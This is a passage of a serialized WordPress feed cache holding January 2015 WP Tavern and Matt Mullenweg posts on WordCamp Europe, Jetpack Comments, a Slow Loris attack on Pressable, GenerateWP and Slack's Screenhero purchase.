\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Chris Lema’s Session From PressNomics 3 on Managing Time and Energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38135\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/chris-lemas-session-from-pressnomics-3-on-managing-time-and-energy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:968:\"<p>One of my favorite sessions at <a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">PressNomics 3</a> is now <a title=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\" href=\"https://www.youtube.com/watch?v=KD9XtifLp9Y\">available to watch for free</a> on YouTube. Although sessions weren&#8217;t recorded or live streamed, Chris Lema used his own gear to record his presentation. He shares the lessons he&#8217;s learned throughout his career on managing time and energy.</p>\n<p>One of my favorite tips is writing down three things you want to get done each day. Each completed task builds confidence and over time, you end up with a lot of accomplishments. So far, the technique is working and as long as I complete two out of three tasks each day, I feel pretty good about myself.</p>\n<p><span class=\"embed-youtube\"></span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 22:23:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Seville, Spain to Host WordCamp Europe 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38031\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://wptavern.com/seville-spain-to-host-wordcamp-europe-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3322:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg\" rel=\"prettyphoto[38031]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg?resize=1025%2C505\" alt=\"seville\" class=\"aligncenter size-full wp-image-38107\" /></a></p>\n<p>The WordCamp Europe organization team <a href=\"http://europe.wordcamp.org/2015/wceu-2015-lets-go/\" target=\"_blank\">announced</a> today that the 2015 event will be held in Seville, Spain from June 26 – 28 at the <a href=\"http://www.hotelbarcelorenacimiento.com/\" target=\"_blank\">Barceló Gran Hotel Renacimiento</a>. Last year&#8217;s <a href=\"http://wptavern.com/wordpress-beyond-boundaries-a-recap-of-wordcamp-europe-2014\" target=\"_blank\">WordCamp in Sofia, Bulgaria</a> was a tremendous success with nearly 800 attendees, a world-class speaker lineup, and a strong local community of volunteers.</p>\n<p>Ordinarily, the WCEU organizers select a host city based on applications from various European WordPress communities after an open call. However, this year is an exception. WordCamp Central prevailed upon the team to have the event in late spring or summer in order to accommodate WordCamp US, which is expected to take place in the fall.</p>\n<p>&#8220;As we had to move WordCamp Europe to the first half of the year, we were quite limited in time,&#8221; organizer Petya Raykovska said. &#8220;So instead of publishing an open call for applications, we decided to reach out to some of the best established WordPress communities in Europe that have experienced teams of local organizers and asked them to prepare bids to host WCEU 2015. We received three very good applications from three different teams.&#8221;</p>\n<p>The WCEU organization team landed on Seville after considering various factors, such as the local organizers&#8217; preparation of the budget and venue research. &#8220;We chose Seville because of the excellent job they did with the application,&#8221; Raykovska said. &#8220;But also because of the great, experienced local team, because it’s a great location with a very different vibe from Sofia &#8211; it’s affordable, well connected with the rest of Europe, and has a very strong local WordPress community.&#8221;</p>\n<p>The WordPress community in Seville has held a local <a href=\"https://twitter.com/wcsevilla\" target=\"_blank\">WordCamp</a> for the past several years. The city&#8217;s metropolitan area has approximately 1.5 million residents, making it a decent-sized city for hosting an event. Attendees should expect to pack for warm weather, as the Seville&#8217;s average high temperatures in the summer often reach above 35 °C.</p>\n<p><a href=\"http://siobhanmckeown.com/\" target=\"_blank\">Siobhan McKeown</a> will be leading a team of 18 <a href=\"http://europe.wordcamp.org/2015/organizers/\" target=\"_blank\">organizers</a> for the 2015 event, including five experienced local organizers and a global team of organizers from all over Europe.</p>\n<p>Tickets will go on sale at the beginning of February, and the organization team will be calling for speakers and sponsors in the next few days. Unlike last year&#8217;s event, WordCamp Europe 2015 will include interpretation for the local language. While all sessions will be given in English, a Spanish translation will be offered simultaneously.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 20:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Why Jetpack Comments is Not A Great Alternative to WordPress’ Native Comment Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wptavern.com/why-jetpack-comments-is-not-a-great-alternative-to-wordpress-native-comment-form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7500:\"<p>Jetpack ships with more than <a title=\"http://jetpack.me/\" href=\"http://jetpack.me/\">30 different modules </a>including, <a title=\"http://jetpack.me/support/comments/\" href=\"http://jetpack.me/support/comments/\">Jetpack Comments</a>. One of its primary features is allowing people to login using credentials from their WordPress.com, Twitter, Facebook, or Google+ accounts.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38094\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png?resize=499%2C374\" alt=\"Jetpack Comments Form\" /></a>Jetpack Comments Form\n<p>This module has replaced the WordPress native comment form for nearly two years on WP Tavern. It makes it easier for people on social networks to post a comment, but the convenience comes with several drawbacks.</p>\n<h2>Lack of a Graceful Fallback</h2>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-20439\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png?resize=646%2C201\" alt=\"Jetpack Comments Temporarily Offline\" /></a>Out Of Fuel\n<p>In early 2014, <a title=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\" href=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\">several Tavern readers experienced</a> <strong>Service Temporarily Unavailable</strong> errors when trying to submit a comment. The error was caused by a security setting with <a title=\"http://www.modsecurity.org/\" href=\"http://www.modsecurity.org/\">mod_security</a> on DreamHost and exposed the lack of a graceful fallback. Instead of displaying an error, the iFrame should have been replaced with the native comment form. I <a title=\"https://github.com/Automattic/jetpack/issues/446\" href=\"https://github.com/Automattic/jetpack/issues/446\">created an issue</a> on Github explaining the problem and although it gained immediate attention, not much has happened since.</p>\n<h2>Annoying Page Refreshes</h2>\n<p>It&#8217;s normal for articles on the Tavern to have several comments with multi-threaded conversations. I&#8217;ve discovered that Jetpack Comments will sometimes take me to a different part of the page after I reply to a comment instead of taking me to where the comment is published. It doesn&#8217;t happen all the time, but when it does, it&#8217;s annoying.</p>\n<p>It&#8217;s 2015, 10 years after the term <a title=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\" href=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\">Ajax was coined by Jesse James Garrett</a>. Ajax stands for Asynchronous JavaScript + XML. It&#8217;s a collection of technologies that provide near real-time interaction with page elements. For example, if you leave a comment on a site running the <a title=\"http://p2theme.com/\" href=\"http://p2theme.com/\">P2 theme</a>, it will appear on the site without refreshing the page.</p>\n<p>Page refreshes are distracting, annoying, and break the flow of a conversation. I&#8217;m <a title=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\" href=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\">not the first one</a> to request Jetpack Comments be Ajaxified. In an <a title=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\" href=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\">issue on Jetpack&#8217;s Github account</a>, George Stephanis, who is a member of the Jetpack development team explains that, while theoretically possible, it&#8217;s not high on the priority list.</p>\n<blockquote><p>It&#8217;s theoretically possible passing the event through JS <code>window.postMessage</code> &#8212; but to actually render the comment would take some theme integration that we can&#8217;t presently assume. If someone wanted to write this I&#8217;d be fine accepting a pull request that fires an event and passes some limited data back, like the comment ID and status or something, but it&#8217;s not high on the priority list.</p></blockquote>\n<p>The ticket has gained little traction with no signs of Ajax support being added anytime soon. His response is similar to Matt Mullenweg&#8217;s in <a title=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\" href=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\">episode 130 of WordPress Weekly</a>, when I asked him <a title=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\" href=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\">why comments haven&#8217;t changed much</a> in WordPress over the years, “It’s very difficult to iterate comments as it’s hard to get those changes to be compatible with every WordPress theme in the world.&#8221;</p>\n<h2>It&#8217;s Not Highly Extendable</h2>\n<p>One of the biggest problems I have with Jetpack Comments is that it&#8217;s not easily extendable using plugins. Since it&#8217;s an iFrame hosted on WordPress.com, it&#8217;s hard to manipulate and is an <strong>all or nothing </strong>approach.</p>\n<h2>The Old Comment Form</h2>\n<p>In 2011, I used <a title=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\" href=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\">a collection of plugins</a> to add features to the native comment form so it felt more like a reply box on a forum. Readers had the ability to style and preview comments without having to write code. They could also subscribe to the thread and edit their comment afterwards for up to 10 minutes.</p>\n<p>However, my favorite feature was the Reply link next to each comment. When clicked, the name along with a link to the comment id was automatically added to the comment form. For example, <strong>@&lt;a href=&#8221;#comment-11784&#8243; rel=&#8221;reply&#8221;&gt;Name of Awesome Commenter&lt;/a&gt; &#8211; Comment text here</strong>. Since the theme didn&#8217;t support threaded comments at the time, this feature came in handy.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38095\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png?resize=625%2C657\" alt=\"Comment Form Used on The Tavern in 2011\" /></a>Comment Form Used on The Tavern in 2011\n<p>Although some of the features are replicated in Jetpack Comments, the old form felt like a better experience to me. If you&#8217;re a long time commenter on the Tavern, I&#8217;m curious if you feel the same way?</p>\n<h2>I Don&#8217;t Recommend Jetpack Comments</h2>\n<p>In an era where Twitter, Facebook, etc. provide the ability for real-time communication, Jetpack Comments and the default comment system in WordPress feels like ancient technology. If all you need is an easy way for people to login using their social media accounts to post a comment, Jetpack Comments is a good solution. However, if you need something more robust, look elsewhere.</p>\n<p>Unless the team adds Ajax support for comment submissions and makes the module more extendable, I can&#8217;t recommend it as a viable alternative to the native comment form in WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 18:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Recent Pressable Outages the Result of a Slow Loris Attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38064\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/recent-pressable-outages-the-result-of-a-slow-loris-attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3011:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg\" rel=\"prettyphoto[38064]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg?resize=700%2C346\" alt=\"photo credit: BBC Nature\" class=\"size-full wp-image-38071\" /></a>photo credit: <a href=\"http://www.bbc.co.uk/nature/life/Slow_loris\">BBC Nature</a>\n<p>Last week, <a href=\"https://pressable.com/\" target=\"_blank\">Pressable</a> was engaged in a 24/7 struggle to keep its customers&#8217; sites operational. The <a href=\"http://wptavern.com/pressable-struggles-to-retain-customers-following-recent-outages\" target=\"_blank\">recent outages</a> caused some customers 24+ hours of downtime and many closed their accounts in favor of finding an alternative host. Today the company announced that the root cause of the outage customers experienced the week of January 19, 2015, was an intentional attack on Pressable&#8217;s systems.</p>\n<p>A <a href=\"https://pressable.com/blog/2015/01/28/root-cause-analysis-outage-week-january-19-2015/\" target=\"_blank\">post</a> on the company&#8217;s blog further breaks down the attack: <strong>&#8220;Ultimately, the reason for this outage was a well crafted attack on our systems. The attack was a variant of the “<a href=\"http://en.wikipedia.org/wiki/Slowloris_%28software%29\" target=\"_blank\">Slow-Loris</a>” attack discovered in 2009.&#8221;</strong></p>\n<p>The attack went undetected because of the insidious manner in which it was executed. Pressable has been working with security professionals to get the attack under control and announced <a href=\"http://status.pressable.com/2015/01/24/all-systems-operational/\" target=\"_blank\">all systems operational</a> on Monday.</p>\n<p>A week ago, after hearing about Pressable&#8217;s continued struggle with downtime, I asked CEO Vid Luther if the company was being intentionally sabotaged. At the time, he didn&#8217;t think that an attack was a real possibility:</p>\n<blockquote><p>I do not believe that anyone who has an agenda against Pressable is behind these issues. I&#8217;m not aware of anyone who has an agenda against Pressable, besides the general competition in the WordPress hosting space, and currently, some of them are acting like vultures. But, I don&#8217;t think those guys have the ability to orchestrate something like this. So, unfortunately, no conspiracy theory from our side.</p></blockquote>\n<p>While working to mitigate customer downtime, the Pressable team discovered the coordinated attack on their systems. The attacker&#8217;s sophisticated method of sabotaging Pressable went undetected, because it was made to appear that the host&#8217;s infrastructure was being overloaded.</p>\n<p>The knowledge of the attack came after multiple apologies from Luther, who originally identified Pressable&#8217;s lagging infrastructure as the cause. Luther told the Tavern that he has an idea of who the attackers are but will be digging into it further before calling out any parties publicly.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 22:43:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: GenerateWP Introduces WordPress Custom Code Snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37861\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5357:\"<p><a href=\"http://generatewp.com/\" target=\"_blank\">GenerateWP</a>, the popular WordPress code generator site, is celebrating two years in operation this week. The site, founded by <a href=\"https://profiles.wordpress.org/ramiy\" target=\"_blank\">Rami Yushuvaev</a>, launched with five code generators and now has more than 20. Yushuvaev sees the site as an educational tool that helps WordPress developers learn more about coding best practices.</p>\n<p>Before launching GenerateWP, Yushuvaev created <a href=\"http://www.wp-tricks.co.il/generator/\" target=\"_blank\">three code generators</a> to serve the Israeli WordPress community. The site was an instant success, which prompted him to translate it into English and launch GenerateWP in January 2013.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg?resize=727%2C221\" alt=\"generatewp-hebrew\" class=\"aligncenter size-full wp-image-38035\" /></a></p>\n<p>The first week after launching, Yushuvaev was approached by a major brand that offered to buy the site and a few developers made offers to finance more generators. &#8220;I decided that it wasn’t the right time to give up the site, since I had big plans for it and for the WordPress community,&#8221; he said.</p>\n<p>The site has 15K+ registered WordPress developers and averages 100,000 visitors per month, most of whom are designers and developers. During the past two years, Yushuvaev worked with contributors Maor Chasen and Ohad Raz to rewrite the entire code base to use object-oriented programming and make it work better with WordPress.</p>\n<p>In celebration of the site&#8217;s two year birthday, GenerateWP is introducing custom code snippets, which will allow users to save their own snippets in a public and/or private library. &#8220;Front-end designers use <a href=\"http://Codepen.io\" target=\"_blank\">codepen.io</a> to showcase their code, JavaScript developers use <a href=\"http://jsfiddle.net\" target=\"_blank\">jsfiddle.net</a>, Bootstrap developers have <a href=\"http://bootsnipp.com\" target=\"_blank\">bootsnipp.com</a>, and now WordPress developers have <a href=\"http://GenerateWP.com\" target=\"_blank\">GenerateWP.com</a>,&#8221; Yushuvaev said.</p>\n<p>The site now includes a collective <a href=\"http://generatewp.com/snippet/\" target=\"_blank\">library of public snippets</a> shared with the community. Users can also browse public snippets by author.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg?resize=963%2C458\" alt=\"rami-snippets\" class=\"aligncenter size-full wp-image-38047\" /></a></p>\n<p>Individual <a href=\"http://generatewp.com/snippet/nvMganl/\" target=\"_blank\">snippets</a> allow users to share, download, or clone the code into their own libraries. Developers can embed snippets on their sites, send them to <a href=\"http://pastebin.com/\" target=\"_blank\">Pastebin</a>, or create a <a href=\"https://gist.github.com/\" target=\"_blank\">GitHub gist</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg?resize=957%2C483\" alt=\"generatewp-snippets\" class=\"aligncenter size-full wp-image-38049\" /></a></p>\n<h3>Future Plans for Expanding GenerateWP</h3>\n<p>Yushuvaev has plans to monetize the site further down the road but said that the generators and code snippets will always remain free. &#8220;The money will come from other services,&#8221; he said. &#8220;I can&#8217;t reveal our plans but you can expect a game changing feature for our premium users.&#8221;</p>\n<p>In the meantime, the team plans to create new code generators, including a tool to generate widgets, a meta box generator, and admin menu page generators. In the coming weeks, the site will also provide an oEmbed option to embed snippets using nothing but the URL.</p>\n<p>Currently, the most popular generators on the site are the ones for creating custom post types, shortcodes, and custom taxonomies. Yushuvaev is optimistic that the site will continue to grow as more developers discover how much time they can save with the generators.</p>\n<p>I was writing the same code over and over again (post types and taxonomies) for different clients,&#8221; he said. &#8220;Creating an automatic generator to save some time was the next logical step.&#8221; He found that writing code eats up plenty of time and did not want to utilize free plugins, as they often do not remain in active development.</p>\n<p>GenerateWP is quickly becoming a popular tool for WordPress educators. &#8220;The site is used in WordPress classes around the world to teach new developers how to properly code using WordPress coding standards,&#8221; Yushuvaev said. &#8220;We managed to confirm a class in Thailand, universities and colleges in Israel, United States, Canada, and Germany.</p>\n<p>&#8220;We also have received requests to translate our tools to other languages,&#8221; he said. The GenerateWP team plans to add translations in the near future to open up the site to more international users.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 21:20:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Slack Buys Screenhero\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44638\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/01/slack-buys-screenhero/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:534:\"<p><a href=\"http://techcrunch.com/2015/01/28/slack-buys-screenhero-to-add-screen-sharing-and-voice-chat-to-its-work-messaging-platform/\">Slack Buys Screenhero To Add Screen Sharing And Voice Chat To Its Work Messaging Platform</a>, which I&#8217;m very excited about as a daily user of Slack (on 5 teams now) and through <a href=\"http://audrey.co/\">Audrey</a> an investor in <a href=\"https://screenhero.com/\">Screenhero</a> and a big fan of their vision. As the article mentions, Automattic has been a Screenhero customer as well.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 19:47:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WPTavern: Thank a Plugin Author Day 